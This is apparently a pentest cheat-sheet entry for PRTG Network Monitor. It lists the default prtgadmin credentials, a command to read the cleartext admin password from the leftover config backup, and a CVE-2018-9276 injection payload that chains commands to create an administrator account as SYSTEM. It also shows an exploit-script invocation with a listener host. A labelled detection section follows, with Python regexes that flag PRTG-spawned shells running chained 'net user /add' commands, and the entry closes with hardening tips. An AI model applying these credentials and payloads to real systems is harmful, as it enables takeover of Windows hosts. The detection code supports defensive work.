Service bank
MONITORING 80/tcp 443/tcp

PRTG Network Monitor

aka PRTG, Paessler

Windows network monitor. Default creds are common, old config backups leak the admin password, and CVE-2018-9276 turns a notification into command execution as SYSTEM.

Ports

Port | Proto | Notes
80   | tcp   | PRTG web UI
443  | tcp   | PRTG web UI (TLS)

Fingerprint

  • PRTG login page; version shown in the page source / footer
  • Server header references PRTG

Key files

Path | Holds | Sensitive
C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old | old config with cleartext admin credentials | sensitive
PRTG Configuration.dat | live config (credentials, sensors) | sensitive

Default / weak creds

  • prtgadmin / prtgadmin (default)

Service users

SYSTEM (PRTG service runs as SYSTEM)

Known CVEs

CVE | Impact
CVE-2018-9276 | Authenticated OS command injection via notification parameters, executes as SYSTEM

Exploitation primitives

  • Default prtgadmin/prtgadmin, or recover the password from the .old config backup
  • CVE-2018-9276: create a notification with a demo EXE/param that injects a command (add a local admin, reverse shell) as SYSTEM

Overview

PRTG runs as SYSTEM on Windows, so command execution through it is an instant SYSTEM. Even before the CVE, a leftover PRTG Configuration.old often hands over the admin password.

Recover the admin password

The leftover config backup holds cleartext creds. It is often reachable over an anonymous share/FTP, or once you have any file read on the host:

type "C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak"

Then log in with prtgadmin + the recovered password (or try the default prtgadmin:prtgadmin).

CVE-2018-9276 (authenticated → SYSTEM)

In the UI: Setup → Notifications → add → Execute Program, set a parameter that injects a command:

test.txt;net user pwn Pwn123! /add;net localgroup administrators pwn /add

Save, then Test the notification to run it as SYSTEM. The exploit can also be driven over the API:

python3 prtg-exploit.py -i http://<TARGET> -u prtgadmin -p '<PASS>' --lhost <YOUR_IP>
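Detection side, as an added example (not part of this cheat sheet or of PRTG): the notification runs as a child of the PRTG service, so process-creation telemetry (Sysmon Event 1 / Windows 4688) can flag a shell spawned by PRTG whose parameter chains a second command or adds an account. The PRTG binary names, the demo script name and the sample events are assumptions/constructed; 18.2.39 is the threshold the page names.

```python
import re
from typing import Dict, List, Tuple

# Assumed PRTG process names (core server and probe); adjust to your deployment.
PRTG_PARENTS = {"prtg server.exe", "prtg probe.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Notification parameter that chains a second command with ; & or |.
CHAINED = re.compile(r"[;&|]\s*(net1?\s+(user|localgroup)\b|whoami|cmd|powershell)", re.I)
# Account creation / group change, the payload shape the cheat sheet shows.
ADMIN_ADD = re.compile(r"net1?\s+(user|localgroup)\s+\S+.*\s/add\b", re.I)
FIXED_VERSION = (18, 2, 39)  # build the cheat sheet names as the patch threshold

def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: Dict[str, str]) -> List[str]:
    """Return reasons to alert on one process-creation event (empty = benign)."""
    reasons: List[str] = []
    if _name(ev["parent"]) in PRTG_PARENTS and _name(ev["image"]) in SHELLS:
        cmd = ev["cmdline"]
        if CHAINED.search(cmd):
            reasons.append("command chaining in PRTG notification parameter")
        if ADMIN_ADD.search(cmd):
            reasons.append("account/group change launched by PRTG")
    return reasons

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]

def is_vulnerable_version(version: str) -> bool:
    """True when a PRTG version string is below the fixed build."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts < FIXED_VERSION

# Constructed sample telemetry (not real logs); demo-notification.ps1 is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -File demo-notification.ps1 "test.txt;net user pwn Pwn123! /add;net localgroup administrators pwn /add"'},
    {"parent": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -File demo-notification.ps1 "sensor-down.txt"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c net user helpdesk /add"},  # not PRTG-spawned: out of scope here
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
    print("18.2.38 vulnerable:", is_vulnerable_version("18.2.38"))
```

Only the first event trips both rules; a normal notification run (second event) stays quiet because the rule keys on chaining characters and `/add`, not on PRTG spawning PowerShell at all.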

Hardening

Change default creds, patch past 18.2.39, and protect config backups.

References